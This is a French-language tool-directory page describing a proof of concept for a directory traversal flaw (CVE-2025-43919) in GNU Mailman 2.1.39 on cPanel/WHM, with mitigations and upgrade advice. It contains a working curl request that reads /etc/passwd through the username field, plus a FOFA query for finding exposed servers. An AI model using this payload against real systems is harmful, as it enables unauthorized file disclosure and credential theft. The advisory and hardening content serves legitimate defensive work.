Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-43919-POC — Une nouvelle vulnérabilité a été découverte dans GNU Mailman 2.1.39, fourni avec cPanel/WHM, permettant à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur via une faille de traversée de répertoire. | Kitploit
Outils/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

Une nouvelle vulnérabilité a été découverte dans GNU Mailman 2.1.39, fourni avec cPanel/WHM, permettant à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur via une faille de traversée de répertoire.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
111il y a 1 anPas encore vérifié
Partager

🚨 CVE-2025-43919 : Directory Traversal dans GNU Mailman 2.1.39 (cPanel/WHM)

Une nouvelle vulnérabilité a été découverte dans GNU Mailman 2.1.39, fourni avec cPanel/WHM, permettant à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur via une faille de traversée de répertoire.

📌 Résumé de la vulnérabilité :

  • Type : Directory Traversal (Non authentifié)
  • Composant : script CGI private.py
  • Point de terminaison affecté : /mailman/private/mailman
  • Impact : Divulgation de fichiers comme /etc/passwd, archives .mbox et configurations Mailman
  • Score CVSS : 5.8 (Moyen)
  • CVE ID : CVE-2025-43919

Statut : Aucun patch officiel (Mailman 2.1.x est en fin de vie)

🔥 Preuve de concept :

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 Scénarios d'exploitation :

  • Extraction de /etc/passwd, configs ou fichiers mailbox
  • Fuite d'identifiants et d'archives sensibles
  • Chaînage avec d'autres bugs pour une RCE ou escalade de privilèges

🛡️ Atténuations : Bloquer l'accès à /mailman/private au niveau du serveur web :

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

Ou dans Nginx :

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ Migrer vers Mailman 3.x — 2.x est en fin de vie et manque de protections modernes

🔍 Requête FOFA : app="Mailman"

📚 Apprenez-en plus, partagez de manière responsable et gardez votre infrastructure sécurisée.

🔒 Suivez pour plus de CVEs réelles, de PoCs et de conseils de durcissement : 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

Télécharger l’outil